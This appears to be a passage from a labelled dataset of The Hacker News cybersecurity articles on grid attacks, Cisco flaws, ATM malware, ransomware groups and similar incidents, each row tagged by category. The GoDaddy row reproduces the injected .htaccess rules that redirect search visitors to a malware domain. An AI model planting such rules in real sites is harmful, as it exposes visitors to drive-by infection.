""The virus was already identified and the right software was already prepared to neutralize it,"" Steinitz added. ""We'd to paralyze many of the computers of the Israeli Electricity Authority. We are handling the situation and I hope that soon, this very serious event will be over...but as of now, computer systems are still not working as they should.""
Severe Cyber Attack on Israel Electricity Infrastructure
The 'severe' attack occurred earliest this week, as Israel is currently undergoing record-breaking electricity consumption for last two days with a demand of 12,610 Megawatts due to the freezing temperature, confirmed by Israel Electric Corporation.
However, the officials did not comment upon the perpetrators as they do not suspect any currently, but they did tell Israeli newspaper Haaretz that '[they] are going to solve this problem in the coming hours.'
In Mid-July 2015, the Israel's National Cyber Bureau had already warned about the computer-based hacking attacks, which shut down portions of the country's electricity grid.
The identity of the suspects behind this attack has not been known, neither the energy ministry provides any details about how the attack was carried out.
However, a spokesperson for Israel's Electricity Authority confirmed some of its computer systems had been shut down for two days due to the cyber attack.
Previous Known Cyber Attacks on SCADA Systems
Israel had been the continual victim for many of the cyber attacks previously like OpIsrael (a coordinated attack by anti-Israeli Groups & Palestinians), which was conducted on 7th April 2013, on the eve of Holocaust Remembrance Day with the goal of ""Erase Israel from Internet.""
Another attack on the Israeli Civilian communication was carried out by Iran & Hezbollah Group last year.
In response to these attacks, Israel had broadened their skills to combat cyber war and become a center for cybersecurity, R&D Labs with multinationals from the US, Europe, and Asia. Israeli Cyber Security firms claimed to export $3 Billion last year.
A similar incident of power outbreak took place a couple of months back in Ukraine on 23rd December, when the country's SCADA system was hit with a trojan named BlackEnergy that resulted in the total power cut across the region named Ivano-Frankivsk of Ukraine.
This Article has been written by our editorial intern. Special Thanks to Rakesh Krishnan for covering this article.
",Cyber_Attack
Critical flaw leaves thousands of Cisco Switches vulnerable to remote hacking,https://thehackernews.com/2018/04/cisco-switches-hacking.html,"Security researchers at Embedi have disclosed a critical vulnerability in Cisco IOS Software and Cisco IOS XE Software that could allow an unauthenticated, remote attacker to execute arbitrary code, take full control over the vulnerable network equipment and intercept traffic.
The stack-based buffer overflow vulnerability (CVE-2018-0171) resides due to improper validation of packet data in Smart Install Client, a plug-and-play configuration and image-management feature that helps administrators to deploy (client) network switches easily.
Embedi has published technical details and Proof-of-Concept (PoC) code after Cisco today released patch updates to address this remote code execution vulnerability, which has been given a base Common Vulnerability Scoring System (CVSS) score of 9.8 (critical).
Researchers found a total of 8.5 million devices with the vulnerable port open on the Internet, leaving approximately 250,000 unpatched devices open to hackers.
To exploit this vulnerability, an attacker needs to send a crafted Smart Install message to an affected device on TCP port 4786, which is opened by default.
""To be more precise, the buffer overflow takes place in the function smi_ibc_handle_ibd_init_discovery_msg"" and ""because the size of the data copied to a fixed-size buffer is not checked, the size and data are taken directly from the network packet and are controlled by an attacker,"" Cisco explain in its advisory.
The vulnerability can also result in a denial-of-service condition (watchdog crash) by triggering indefinite loop on the affected devices.
Researchers demonstrated the vulnerability at a conference in Hong Kong after reporting it to Cisco in May 2017.
Video Demonstrations of the Attack:
In their first demonstration, as shown in the video below, researchers targeted Cisco Catalyst 2960 switch to reset/change the password and entered privileged EXEC mode:
In their second demo, researchers exploited the flaw to successfully intercept the traffic between other devices connected to the vulnerable switch and the Internet.
Affected Hardware and Software:
The vulnerability was tested on Catalyst 4500 Supervisor Engines, Cisco Catalyst 3850 Series Switches, and Cisco Catalyst 2960 Series Switches devices, as well as all devices that fall into the Smart Install Client type are potentially vulnerable, including:
Catalyst 4500 Supervisor Engines
Catalyst 3850 Series
Catalyst 3750 Series
Catalyst 3650 Series
Catalyst 3560 Series
Catalyst 2960 Series
Catalyst 2975 Series
IE 2000
IE 3000
IE 3010
IE 4000
IE 4010
IE 5000
SM-ES2 SKUs
SM-ES3 SKUs
NME-16ES-1G-P
SM-X-ES3 SKUs
Cisco fixed the vulnerability in all of its affected products on 28th March 2018, and Embedi published a blog post detailing the vulnerability on 29th March. So, administrators are highly recommended to install free software updates to address the issue as soon as possible.
",Vulnerability
Hackers stole money from European ATMs using Malware-loaded USB Device,https://thehackernews.com/2014/01/hacking-ATM-machine-Malware-USB-Drive.html,"Hacking ATM Machines is nothing new, but it seems that instead of relying on ATM skimmers now some smart hackers in Europe are reportedly targeting ATM Machines using Malware-loaded USB drives to steal money.
Most of the world's ATMs are running on Windows XP operating system, which is highly vulnerable to Malware attacks. Just like your Desktop Laptops, some ATMs also have USB sockets, which is hidden behind the ATM's fascia.
The German security researchers who discovered the hack detailed their findings at the Chaos Computing Congress in Hamburg, Germany recently. They said that the thieves cut holes in the fascia to access a USB port and then uploaded malware to the machines.
The malware creates a backdoor that can be accessed on the front panel. ""These researchers explained that the malware allowed the thieves to create a unique interface on the ATMs by typing in a 12-digit code. This interface allowed for withdrawal and also showed the criminals the amount of money and each bill denomination inside the machines. This meant the thieves could save time by only taking the highest value bills."" Dara Kerr from CNET news reported.
Once the thieves finished their theft at a cash machine, they would patch up the hole to allow the same exploit to be used on other machines. This indicates that the criminal crew is highly familiar with the ATMs mechanism.
The malware does not appear to harvest customer PINs or other sensitive data and now some banks have upgraded their ATMs to prevent them from booting from external USB drives.
",Malware
Pre-Installed Malware Dropper Found On German Gigaset Android Phones,https://thehackernews.com/2021/04/pre-installed-malware-dropper-found-on.html,"In what appears to be a fresh twist in Android malware, users of Gigaset mobile devices are encountering unwanted apps that are being downloaded and installed through a pre-installed system update app.
""The culprit installing these malware apps is the Update app, package name com.redstone.ota.ui, which is a pre-installed system app,"" Malwarebytes researcher Nathan Collier said. ""This app is not only the mobile device's system updater, but also an auto installer known as Android/PUP.Riskware.Autoins.Redstone.""
The development was first reported by German author and blogger Günter Born last week.
While the issue seems to be mainly affecting Gigaset phones, devices from a handful of other manufacturers appear to be impacted as well. The full list of devices that come with the pre-installed auto-installer includes Gigaset GS270, Gigaset GS160, Siemens GS270, Siemens GS160, Alps P40pro, and Alps S20pro+.
According to Malwarebytes, the Update app installs three different versions of a trojan (""Trojan.Downloader.Agent.WAGD"") that's capable of sending SMS and WhatsApp messages, redirecting users to malicious game websites, and downloading additional malware-laced apps.
""The malicious WhatsApp messages are most likely in order to further spread the infection to other mobile devices,"" Collier noted.
Users have also reported experiencing a second separate strain of malware called ""Trojan.SMS.Agent.YHN4"" on their mobile devices after landing on gaming websites redirected by the aforementioned WAGD trojan, which mirrors the latter's SMS and WhatsApp messaging functionality to propagate the malware.
Unlike third-party apps downloaded from the Google Play Store, system apps cannot be easily removed from mobile devices without resorting to tools like Android Debug Bridge (ADB).
For its part, Gigaset confirmed the malware attack, stating that an update server used by the devices to fetch software updates was compromised and that only devices that relied on that specific update server were affected. The company has since fixed the issue and is expected to push an update to remove the malware from infected phones, according to Born.
The development comes a week after cybersecurity researchers revealed a new Android malware that was found to pilfer users' photos, videos, and GPS locations by sending a fraudulent notification posing as a ""System Update"" that is ""Searching for update.""
When reached for a response, Gigaset said it's investigating the software supply chain incident, adding ""we are working closely with IT forensic experts and the relevant authorities. We will inform the affected users as quickly as possible and provide information on how to resolve the problem.""
""It is also important to mention at this point that, according to current knowledge, the incident only affects older devices. We currently assume that the devices GS110, GS185, GS190, GS195, GS195LS, GS280, GS290, GX290, GX290plus, GX290 PRO, GS3 and GS4 are not affected,"" it noted.
",Malware
FIN11 Hackers Spotted Using New Techniques In Ransomware Attacks,https://thehackernews.com/2020/10/fin11-hackers-spotted-using-new.html,"A financially-motivated threat actor known for its malware distribution campaigns has evolved its tactics to focus on ransomware and extortion.
According to FireEye's Mandiant threat intelligence team, the collective — known as FIN11 — has engaged in a pattern of cybercrime campaigns at least since 2016 that involves monetizing their access to organizations' networks, in addition to deploying point-of-sale (POS) malware targeting financial, retail, restaurant, and pharmaceutical sectors.
""Recent FIN11 intrusions have most commonly led to data theft, extortion and the disruption of victim networks via the distribution of CLOP ransomware,"" Mandiant said.
Although FIN11's activities in the past have been tied to malware such as FlawedAmmyy, FRIENDSPEAK, and MIXLABEL, Mandiant notes significant overlap in TTPs with another threat group that cybersecurity researchers call TA505, which is behind the infamous Dridex banking Trojan and Locky ransomware that's delivered through malspam campaigns via the Necurs botnet.
It's worth pointing that Microsoft orchestrated the takedown of the Necurs botnet earlier this March in an attempt to prevent the operators from registering new domains to execute further attacks in the future.
High-Volume Malspam Campaigns
FIN11, in addition to leveraging a high-volume malicious email distribution mechanism, has expanded its targeting to native language lures coupled with manipulated email sender information, such as spoofed email display names and email sender addresses, to make the messages appear more legitimate, with a strong bent towards attacking German organizations in their 2020 campaigns.
For instance, the adversary triggered an email campaign with email subjects such as ""research report N-[five-digit number]"" and ""laboratory accident"" in January 2020, followed by a second wave in March using phishing emails with the subject line ""[pharmaceutical company name] 2020 YTD billing spreadsheet.""
""FIN11's high-volume email distribution campaigns have continually evolved throughout the group's history,"" Andy Moore, senior technical analyst at Mandiant Threat Intelligence, told The Hacker News via email.
""Although we have not independently verified the connection, there is substantial public reporting to suggest that until sometime in 2018, FIN11 relied heavily on the Necurs botnet for malware distribution. Notably, observed downtime of the Necurs botnet has directly corresponded to lulls in the activity we attribute to FIN11.""
Indeed, as per Mandiant's research, FIN11's operations appear to have ceased entirely from mid-March 2020 through late May 2020, before picking up again in June via phishing emails containing malicious HTML attachments to deliver malicious Microsoft Office files.
The Office files, in turn, made use of macros to fetch the MINEDOOR dropper and the FRIENDSPEAK downloader, which then dispatched the MIXLABEL backdoor on the infected device.
A Shift to Hybrid Extortion
In recent months, however, FIN11's monetization efforts have resulted in a number of organizations infected by CLOP ransomware, in addition to resorting to hybrid extortion attacks — combining ransomware with data theft — in a bid to force businesses into acquiescing to extortion payments that range from a few hundred thousand dollars up to 10 million dollars.
""FIN11's monetization of intrusions via ransomware and extortion follows a broader trend among financially motivated actors,"" Moore said.
""Monetization strategies that have been more common historically, such as the deployment of point-of-sale malware, limit criminals to targeting victims in certain industries, whereas ransomware distribution can allow actors to profit from an intrusion into the network of nearly any organization.
That flexibility, in combination with increasingly frequent reports of ballooning ransom payments, makes it an extremely attractive scheme for financially motivated actors,"" he added.
What's more, FIN11 is purported to have made use of a wide variety of tools (e.g., FORKBEARD, SPOONBEARD, and MINEDOOR) purchased from underground forums, thereby making attribution difficult or accidentally conflating activities of two disparate groups based on similar TTPs or indicators of compromise.
An Actor of Likely CIS Origin
As for the roots of FIN11, Mandiant stated with ""moderate confidence"" that the group operates out of the Commonwealth of Independent States (CIS) owing to the presence of Russian-language file metadata, avoidance of CLOP deployments in CIS countries, and the dramatic fall in activity coinciding the Russian New Year and Orthodox Christmas holiday period between January 1-8.
""Barring some sort of disruption to their operations, it is highly likely that FIN11 will continue to attack organizations with an aim to deploy ransomware and steal data to be used for extortion,"" Moore said.
""As the group has regularly updated their TTPs to evade detections and increase the effectiveness of their campaigns, it is also likely that these incremental changes will continue. Despite these changes, however, recent FIN11 campaigns have consistently relied on the use of macros embedded in malicious Office documents to deliver their payloads.""
""Along with other security best practices, organizations can minimize the risk of being compromised by FIN11 by training users to identify phishing emails, disabling Office macros, and implementing detections for the FRIENDSPEAK downloader.""
",Malware
GoDaddy websites Compromised with Malware,https://thehackernews.com/2011/09/godaddy-websites-compromised-with.html,"GoDaddy websites Compromised with Malware
Many sites hosted on GoDaddy shared servers getting compromised today with a conditional redirection to sokoloperkovuskeci.com.In all 445 cases the .htaccess file (a main Apache web server configuration file) was modified to redirect users to a malware site when they were referred by one of a list of search engines. These redirections attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy hosted sites. So it looks like a compromise on their own servers (similar to what has happened in the past).
This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* https://sokoloperkovuskeci.com/in.php?g=916 [R,L]
The malware checks if anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and if they are, redirects them to that domain (sokoloperkovuskeci.com). In there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users. GoDaddy says they are working with customers to resolve the issue, but if you have a GoDaddy account you should check on this, minimally by Googling for your site and following the link (only if your browser is all patched up and you have sufficient other protections).DomainNameWire also smartly recommends that you check with Google, other search engines and security companies to make sure you haven't been blacklisted.
",Malware
This 20-year-old Student Has Written 100 Malware Programs in Two Years,https://thehackernews.com/2015/07/student-hacker.html,"Security firm Trend Micro has identified a 20-year-old Brazilian college student responsible for developing and distributing over 100 Banking Trojans selling each for around US$300.
Known online as 'Lordfenix', 'Hacker's Son' and 'Filho de Hacker', the computer science student first began his career by posting in forums, asking for programming help for a Trojan he was developing, researchers said.
Developed More than 100 Trojans
However, Lordfenix has ""grown quite confident in his skills"" and began developing and distributing malware tailored to pilfer financial information since at least 2013.
""Based on our research, Lordfenix has created more than 100 different banking Trojans, not including his other malicious tools, since April 2013,"" Trend Micro says. ""With each Trojan costing around R$1,000 (roughly $320), this young cybercriminal channeled his talent in programming into a lucrative, illegal venture.""
Trend Micro has also provided an image of the hacker's Facebook wall post (given below) in which the hacker shows a considerable amount of local currency.
Hacker is Offering Free Versions of Banking Trojans
In order to expand his operation, Lordfenix has now begun offering free versions of fully-functional Banking Trojan source code other wanna-be cyber criminals on the underground forum.
The free versions of the Trojan can be used to steal login details from customers of four different Brazilian banking websites including HSBC Brazil, Bank of Brazil, and Caixa. For access to other financial institutions, 'clients' have to pay for a more powerful tool, TSPY_BANKER.NJH.
TSPY_BANKER.NJH is a Trojan capable to identify when a user enters any of a target bank's URLs into their browser. The malware then shuts down the browser window (if it is running on Google Chrome), displays an error message, and then opens a fake Chrome window.
Once the victim enters the login details into the fake window, the information is sent back to the attackers address via email.
As an extra precaution, Lordfenix's malware also includes a software program to terminate a security process called GbpSV.exe, which is used by large number of Brazilian banks in an effort to keep their online customer data secure.
Malware Threat to Online Banking is Growing rapidly and countries like Brazil, where almost half of all financial transactions are conducted online, have come up as a boon for hackers.
",Malware
Hacking Fiverr.com Accounts — Vulnerability Puts $50 Million Company At Risk,https://thehackernews.com/2014/08/hacking-fiverrcom-accounts_16.html,"Fiverr.com, a global online marketplace which provides a platform for people to sell their services for five dollars per job, is vulnerable to a critical web application vulnerability that puts its millions of users at risk.
Fiverr recently raised $30 million in a third round of institutional funding to continue supporting the new version of its marketplace, but the company ignored the advance warning of the critical bug reported responsibly by a vulnerability hunter and fails to patch up their website before his public release.
There are endless numbers of people providing services on Fiverr website, such as graphic design, language translation, illustration, blogging and a lot more that start from just $5 but can go much higher, depending on complexity, seller rating, and type of work.
According to a security researcher Mohamed Abdelbaset, an Information Security Evangelist from Egypt, told The Hacker News that Fiverr website is vulnerable to CSRF (Cross-site request forgery) vulnerability that allows him to compromise any user account easily.
Cross-Site Request Forgery (CSRF) is a method of attacking a Web site in which an intruder masquerades as a legitimate and trusted user. All the attacker need to do is get the target browser to make a request to your website on their behalf. If they can either:
Convince your users to click on a HTML page they've constructed
Insert arbitrary HTML in a target website that your users visit
Not too difficult, is it?
In this case, an attacker only needs to know the Fiverr profile link of the victim in order to exploit the vulnerability. Using which the attacker will craft and host a exploit webpage on his own server, Mohamed said while demonstrating the vulnerability to THN.
If the victim has already logged into his Fiverr account on the same browser, the CSRF vulnerability will silently replace the victim's Fiverr account email with the attacker's email address. Once done, the attacker can take over the victim's account just by changing the account password from ""Password reset"" option from the website.
The researcher has also provided a video demonstration as a Proof of Concept. The vulnerability is critical and should be fixed as soon as possible.
",Vulnerability
Scranos: New Rapidly Evolving Rootkit-Enabled Spyware Discovered,https://thehackernews.com/2019/04/scranos-rootkit-spyware.html,"A new powerful rootkit-enabled spyware operation has been discovered wherein hackers are distributing multifunctional malware disguised as cracked software or trojanized app posing as legitimate software like video players, drivers and even anti-virus products.
While the rootkit malware—dubbed Scranos—which was first discovered late last year, still appears to be a work in progress, it is continuously evolving, testing new components and regularly making an improvement to old components, which makes it a significant threat.
Scranos features a modular design that has already gained capabilities to steal login credentials and payment accounts from various popular services, exfiltrate browsing history and cookies, get YouTube subscribers, display ads, as well as download and execute any payload.
According to a 48 page in-depth report Bitdefender shared with The Hacker News prior to its release, the malware gains persistence on infected machines by installing a digitally-signed rootkit driver.
Researchers believe attackers obtained the valid digital code-signing certificate fraudulently, which was originally issued to Yun Yu Health Management Consulting (Shanghai) Co., Ltd. and has not been revoked at the time of writing.
""The rootkit registers a Shutdown callback to achieve persistence. At shutdown, the driver is written to disk, and a start-up service key is created in the Registry,"" the researchers say.
Upon infection, the rootkit malware injects a downloader into a legitimate process which then communicates with the attacker-controlled Command-and-Control (C&C) server and downloads one or more payloads.
Here we have listed a few data and password-stealing payloads:
Password and Browsing History Stealing Payload — The main dropper steals browser cookies and login credentials from Google Chrome, Chromium, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer, Baidu Browser and Yandex. It can also steal cookies and login info from victims' accounts on Facebook, YouTube, Amazon, and Airbnb.
Extension Installer Payload — This payload installs adware extensions in Chrome and injects malicious or malware-laden ads on all webpages users visit. A few samples also found installing fake browser extensions, such as Chrome Filter, Fierce-tips and PDF Maker.
Steam Data Stealer Payload — This component steals and sends victims' Steam account credentials and information, including the list of installed apps and games, as well as hardcoded version, to the attacker's server.
Malware Interacts with Facebook and YouTube on Victims' Behalf
Some other payloads can even interact with various websites on the victim's behalf, such as:
YouTube subscriber payload — This payload manipulates YouTube pages by running Chrome in debugging mode, instructing the browser to take various actions on a webpage like starting a video, muting a video, subscribing to a channel, and clicking ads.
Facebook Spammer Payload — Using collected cookies and other tokens, attackers can command malware to send Facebook friend requests to other users. It can also send private messages to the victim's Facebook friends with links to malicious Android APKs.
Android Adware App — Disguised as the legitimate ""Accurate scanning of QR code"" app available on Google Play Store, the malware app aggressively displays ads, tracks infected victims and uses same C&C server as the Windows malware.
Scranos Steals Payment Information from Popular Websites
Here's the list of DLLs contained in the main dropper:
Facebook DLL — This DLL extracts information about the user Facebook accounts including their payment accounts, their list of friends, and if they are an administrator of a page.
Amazon DLL — This DLL extracts information from the user's Amazon account. Researchers even found a version of this DLL that has been designed to extract information from logged-in Airbnb accounts.
According to the telemetry gathered by Bitdefender researchers, Scranos is targeting users worldwide, but ""it seems more prevalent in India, Romania, Brazil, France, Italy, and Indonesia.""
The oldest sample of this malware traced back to November 2018, with a massive spike in December and January, but in March 2019, Scranos was started pushing other strains of malware, which researchers say is ""a clear indicator that the network is now affiliated with third parties in pay-per install schemes.""
",Cyber_Attack
Hackers Infecting Apple App Developers With Trojanized Xcode Projects,https://thehackernews.com/2021/03/hackers-infecting-apple-app-developers.html,"Cybersecurity researchers on Thursday disclosed a new attack wherein threat actors are leveraging Xcode as an attack vector to compromise Apple platform developers with a backdoor, adding to a growing trend that involves targeting developers and researchers with malicious attacks.
Dubbed ""XcodeSpy,"" the trojanized Xcode project is a tainted version of a legitimate, open-source project available on GitHub called TabBarInteraction that's used by developers to animate iOS tab bars based on user interaction.
""XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer's macOS computer along with a persistence mechanism,"" SentinelOne researchers said.
Xcode is Apple's integrated development environment (IDE) for macOS, used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS.
Earlier this year, Google's Threat Analysis group uncovered a North Korean campaign aimed at security researchers and exploit developers, which entailed the sharing of a Visual Studio project designed to load a malicious DLL on Windows systems.
The doctored Xcode project does something similar, only this time the attacks have singled out Apple developers.
Besides including the original code, XcodeSpy also contains an obfuscated Run Script that's executed when the developer's build target is launched. The script then contacts an attacker-controlled server to retrieve a custom variant of the EggShell backdoor on the development machine, which comes with capabilities to record information from the victim's microphone, camera, and keyboard.
""XcodeSpy takes advantage of a built-in feature of Apple's IDE which allows developers to run a custom shell script on launching an instance of their target application,"" the researchers said. ""While the technique is easy to identify if looked for, new or inexperienced developers who are not aware of the Run Script feature are particularly at risk since there is no indication in the console or debugger to indicate execution of the malicious script.""
SentinelOne said it identified two variants of the EggShell payload, with the samples uploaded to VirusTotal from Japan on August 5 and October 13 last year. Additional clues point to one unnamed U.S. organization that's said to have been targeted using this campaign between July and October 2020, with other developers in Asia likely to be targeted as well.
Adversaries have previously resorted to tainted Xcode executables (aka XCodeGhost) to inject malicious code into iOS apps compiled with the infected Xcode without the developers' knowledge, and subsequently use the infected apps to collect information from the devices once they are downloaded and installed from the App Store.
Then in August 2020, researchers from Trend Micro unearth a similar threat that spread via modified Xcode projects, which, upon building, were configured to install a mac malware called XCSSET to steal credentials, capture screenshots, sensitive data from messaging and note taking apps, and even encrypt files for a ransom.
Like XCSSET, XcodeSpy takes an easier route, since the goal appears to be to strike the developers themselves, although the ultimate objective behind the exploitation and the identity of the group behind it remains unclear as yet.
""Targeting software developers is the first step in a successful supply chain attack. One way to do so is to abuse the very development tools necessary to carry out this work,"" the researchers said.
""It is entirely possible that XcodeSpy may have been targeted at a particular developer or group of developers, but there are other potential scenarios with such high-value victims. Attackers could simply be trawling for interesting targets and gathering data for future campaigns, or they could be attempting to gather AppleID credentials for use in other campaigns that use malware with valid Apple Developer code signatures.""
",Malware
"5 High Impact Flaws Affect Cisco Routers, Switches, IP Phones and Cameras",https://thehackernews.com/2020/02/cisco-cdp-vulnerabilities.html,"Several Cisco-manufactured network equipments have been found vulnerable to five new security vulnerabilities that could allow hackers to take complete control over them, and subsequently, over the enterprise networks they power.
Four of the five high-severity bugs are remote code execution issues affecting Cisco routers, switches, and IP cameras, whereas the fifth vulnerability is a denial-of-service issue affecting Cisco IP phones.
Collectively dubbed 'CDPwn,' the reported vulnerabilities reside in the various implementations of the Cisco Discovery Protocol (CDP) that comes enabled by default on virtually all Cisco devices and can not be turned OFF.
Cisco Discovery Protocol (CDP) is an administrative protocol that works at Layer 2 of the Internet Protocol (IP) stack. The protocol has been designed to let devices discover information about other locally attached Cisco equipment in the same network.
According to a report Armis research team shared with The Hacker News, the underlying CDP implementations contain buffer overflow and format string vulnerabilities that could let remote attackers on the same network execute arbitrary code on the vulnerable devices by sending malicious unauthenticated CDP packets.
The list of CDPwn Cisco vulnerabilities affecting tens of millions of devices widely deployed in enterprise networks is as follow:
Cisco NX-OS Stack Overflow in the Power Request TLV (CVE-2020-3119)
Cisco IOS XR Format String vulnerability in multiple TLVs (CVE-2020-3118)
Cisco IP Phones Stack Overflow in PortID TLV (CVE-2020-3111)
Cisco IP Cameras Heap Overflow in DeviceID TLV (CVE-2020-3110)
Cisco FXOS, IOS XR, and NX-OS Resource Exhaustion in the Addresses TLV (CVE-2020-3120)
To be noted, since CDP is a Data Link layer 2 protocol that can't cross the boundaries of a local area network, an attacker first needs to be on the same network to leverage CDPwn vulnerabilities.
However, after gaining an initial foothold in a targeted network using separate vulnerabilities, attackers can exploit CDPwn against network switches to break network segmentation and move laterally across the corporate networks to other sensitive systems and data.
""Gaining control over the switch is useful in other ways. For example, the switch is in a prime position to eavesdrop on network traffic that traverses through the switch, and it can even be used to launch man-in-the-middle attacks on the traffic of devices that traverses through the switch,"" the researchers said.
""An attacker can look to move laterally across segments and gain access to valuable devices like IP phones or cameras. Unlike switches, these devices hold sensitive data directly, and the reason to take them over can be a goal of an attacker, and not merely a way to break out of segmentation.""
Additionally, CDPwn flaws also allow attackers to:
Eavesdrop on voice and video data/calls and video feed from IP phones and cameras, capture sensitive conversations or images.
Exfiltrate sensitive corporate data flowing through the corporate network's switches and routers.
Compromise additional devices by leveraging man-in-the-middle attacks to intercept and alter traffic on the corporate switch.
Besides releasing a detailed technical report on the issues, the Armis research team has also shared videos of explanation and demonstration of the flaws, as embedded above.
After closely working with Armis researchers over the last few months to develop security patches, Cisco today released software updates for all of its affected products.
Though Cisco has also provided some mitigation information, affected administrators are still highly recommended to install the latest software updates to completely protect their valuable networks against malware and emerging online threats.
",Vulnerability
Using LabVIEW? Unpatched Flaw Allows Hackers to Hijack Your Computer,https://thehackernews.com/2017/08/hacking-labview-vi-file.html,"If you're an engineer and use LabVIEW software to design machines or industrial equipments, you should be very suspicious while opening any VI (virtual instrument) file.
LabVIEW, developed by American company National Instruments, is a visual programming language and powerful system-design tool that is being used worldwide in hundreds of fields and provides engineers with a simple environment to build measurement or control systems
Security researchers from Cisco's Talos Security Intelligence have discovered a critical vulnerability in LabVIEW software that could allow attackers to execute malicious code on a target computer, giving them full control of the system.
Identified as CVE-2017-2779, the code execution vulnerability could be triggered by opening a specially crafted VI file, a proprietary file format used by LabVIEW.
The vulnerability originates because of memory corruption issue in the RSRC segment parsing functionality of LabVIEW.
Modulating the values within the RSRC segment of a VI file causes a controlled looping condition, which results in an arbitrary null write.
""A specially crafted LabVIEW virtual instrument file (with the *.vi extension) can cause an attacker controlled looping condition resulting in an arbitrary null write,"" Talos researchers explain.
""An attacker controlled VI file can be used to trigger this vulnerability and can potentially result in code execution.""
Talos researchers have successfully tested the vulnerability on LabVIEW 2016 version 16.0, but National Instruments has refused to consider this issue as a vulnerability in their product and had no plans to release any patch to address the flaw.
However, the issue should not be ignored, because the threat vector is almost similar to many previously disclosed Microsoft Office vulnerabilities, in which victims got compromised after opening malicious MS Word file received via an email or downloaded from the Internet.
""The consequences of a successful compromise of a system that interacts with the physical world, such as a data acquisition and control systems, may be critical to safety,"" the researchers write.
""Organisations that deploy such systems, even as pilot projects, should be aware of the risk posed by vulnerabilities such as these and adequately protect systems.""
Since there is no patch available, the LabVIEW users are left with only one option—be very careful while opening any VI file you receive via an email.
For more technical details about the vulnerability, you can head on to Cisco Talos' advisory.
",Malware
Vulnerability Allows Anyone to DDoS Websites Using Facebook Servers,https://thehackernews.com/2014/04/vulnerability-allows-anyone-to-ddos.html,"Reading a 'Note' created by anyone on the Facebook could trick you automatically to do malicious attacks against others unknowingly.
A Security researcher Chaman Thapa, also known as chr13 claims that the flaw resides in 'Notes' section of the most popular social networking site - Facebook, that could allow anyone to launch the distributed denial-of-service (DDoS) attack of more than 800 Mbps Bandwidth on any website.
A Distributed Denial-of-Service (DDoS) attack is one in which multiple compromised systems attacks a single target system or service to make it unavailable to its intended users. The flood of incoming requests essentially forces the target system or service to shut down, thereby denying service to the system to its legitimate users.
While demonstrating the vulnerability on his blog, he explained that Facebook allows its users to include
tags inside the post in order to draft a note with beautiful related images from any source.
Facebook basically downloads external images from the original source for the first time only, and then cache them, but if the image url have dynamic parameters, then Facebook cache mechanism could be bypassed to force the Facebook servers to download all included images each time whenever anybodys open the note in its browser.
'Facebook will only cache the image once however using random get parameters the cache can be by-passed and the feature can be abused to cause a huge HTTP GET flood.' he said.
DDoS FACTOR, A SCENARIO
Let's suppose if you want to DDoS a website target.com, that have an image of 1 MB Size on its server. An attacker can create a Facebook Note with some text, including same image multiple times with dynamic parameters, i.e.
This way one can force Facebook servers to load 1 mb of file 1000 times in one pageview and if 100 Facebook users are reading the same crafted note at the same time, then Facebook servers will be forced to download 1 x 1000 x 100 = 100,000 Mb or 97.65Gb bandwidth within few seconds from the targeted servers.
400 MBPS DDoS ATTACK DEMO
Researcher demonstrated the proof-of-concept with 400 Mbps attack, by attacking on his own web server. Stats shown below:
The factor and danger of DDoS attack could be even higher when the image is replaced by a pdf or video of larger size, in case Facebook would crawl a huge file but the user gets nothing.
Facebook allows a user to create maximum of 100 Notes in a short span of time and each Note could support more than 1000 links, but because there is no captcha for the Facebook Notes creation, so all this operation can be performed automatically and an attacker could easily creates hundreds of notes using multiple users at the time of performing attack.
""It seems there is no restriction put on Facebook servers and with so many servers crawling at once we can only imagine how high this traffic can get"" he concluded.
STILL UNPATCHED AND DON'T EXPECT ANY PATCH FROM FACEBOOK
Unfortunately, Facebook has no plans to fix this critical vulnerability, ""In the end, the conclusion is that there's no real way to us fix this that would stop attacks against small consumer grade sites without also significantly degrading the overall functionality,"" Facebook replied to the researcher.
Similar kind of attack was noticed in mid of 2011 year when a security penetration tester at Italian security firm AIR Sicurezza Informatica discovered flaws in Google's Plus servers that allowed hackers to exploit the search giant's bandwidth and launch a distributed denial-of-service (DDoS) attack on a server of their choice.
",Vulnerability
Dutch Police arrested TorRAT Malware Gang for stealing over Million Dollar,https://thehackernews.com/2013/10/dutch-police-arrested-torrat-malware.html,"The TorRAT malware was first appeared in 2012 as spying tool only. But from August 2012, Bitcoin Mining feature was added and it became a powerful hacking tool that was commonly associated with attacks on Financial institutions.
ab
This year TorRat Malware targeted two out of three major Banks in the Netherlands and the criminals stole over Million Dollars from user' Banking Accounts.
The Dutch police has arrested four men from Alkmaar, Haarlem, Woubrugge and Roden on last Monday, who are suspected of involvement in the large scale digital fraud and money laundering case using TorRat Malware.
Using Spear Phishing techniques, gang targeted the victims to access their computers and the Financial accounts. The gang used anonymous VPN services, Bitcoins, TorMail and the Tor network itself to remain anonymous.
Malware is also capable of manipulating the information during online banking, can secretly add new payment orders and also able to modify existing orders.
To defend the detection from Antivirus softwares, TorRat uses the ZeuS malware in its attack. The technique was used to divert the focus of researchers to remove ZeuS infection, rather than the unknown malware on the system.
Some of the stolen money was converted by criminals to (56 BTC worth around 7700 Euros) Bitcoin virtual currency, which are now seized by Dutch police. Police also mentioned that, one of arrested criminal having his own Bitcoin exchange service.
The TorRAT malware has been known to be distributed in multiple ways. In April, TorRat was in news for hijacking twitter accounts. After infecting a vulnerable computers, the TorRAT malware hijacks the Twitter user's account and share links that lead to attack websites that attempt to inject TorRAT malware into the victim's computer.
